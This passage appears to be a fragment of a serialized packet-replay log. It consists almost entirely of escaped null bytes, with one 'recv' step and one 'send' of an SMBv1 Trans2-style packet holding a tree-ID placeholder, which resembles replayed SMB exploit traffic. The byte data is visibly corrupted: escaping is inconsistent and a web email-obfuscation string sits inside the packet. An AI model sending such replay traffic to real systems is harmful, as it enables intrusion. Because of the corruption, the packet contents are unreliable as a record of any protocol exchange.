\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0